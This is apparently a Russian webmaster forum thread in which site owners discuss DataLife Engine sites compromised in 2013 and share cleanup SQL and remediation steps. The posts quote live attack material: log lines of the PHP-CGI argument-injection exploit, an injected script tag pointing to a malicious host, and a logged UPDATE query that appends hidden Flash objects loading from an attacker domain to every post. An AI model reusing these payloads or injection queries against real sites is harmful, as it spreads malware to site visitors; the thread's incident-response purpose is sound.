ничего не стояло, голый двиг.
91.224.160.25 - - [09/Sep/2013:19:56:49 +0400] "POST /?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 200 16 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" "-"91.224.160.25 - - [09/Sep/2013:19:56:49 +0400] "POST /phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 200 16 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)" "-"
вот такую бяку еще нашел в логах
нету шелов, ни я ни техподдержка хостинга не нашли новых каких-либо файлов...
/ru/forum/comment/12138030
коперну пост, как я решил проблему.
почистил КЭШ и обновил пароли и поставил заплатку с офф сайта.
пока спокойно все---------- Добавлено 13.09.2013 в 10:30 ----------
<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>
аналогично, искал шелл, ничего не нашел...видимо где-то дыра хорошая.
Понять бы каким образом был получен доступ к базе....
также можно проапдейтить через phpmyadmin
update dle_post set short_story = left(short_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story) > 0 limit 20000update dle_post set full_story = left(full_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story) > 0 limit 20000
для полной и краткой новости, выполнить несколько раз, пока не буддет выдаваться: изменено 0 строк.
<script async="async" type="text/javascript" src="http://google-webmaster.ru/
вот эту бяку можно изменить и под <object, перед этим удостовериться, что у Вас в базе нет подобных нужных строк.
Обязательно поменять пароли, очистить кэш и поставить все фиксы для DLE.
Если кто не может справиться ,пишите в личку, помогу.
вот виновник [95.143.193.61], 205.204.90.114 и так же с локалхоста.
# Time: 130911 12:07:05# User@Host: user[user] @ [95.143.193.61]# Query_time: 17.477933 Lock_time: 0.021231 Rows_sent: 0 Rows_examined: 99297196use base;SET timestamp=1378886825;UPDATE `base`.`dle_post` SET `short_story` = CONCAT(`short_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1315661091"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?783744512" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>'), `full_story` = CONCAT(`full_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?389922127"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1068643096" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>') WHERE ID IN ( SELECT ID FROM ( SELECT ID FROM `base`.`dle_post` WHERE `short_story` NOT LIKE '%webmasters-yandex.ru%' AND `full_story` NOT LIKE '%webmasters-yandex.ru%' LIMIT 0,1000 ) as p );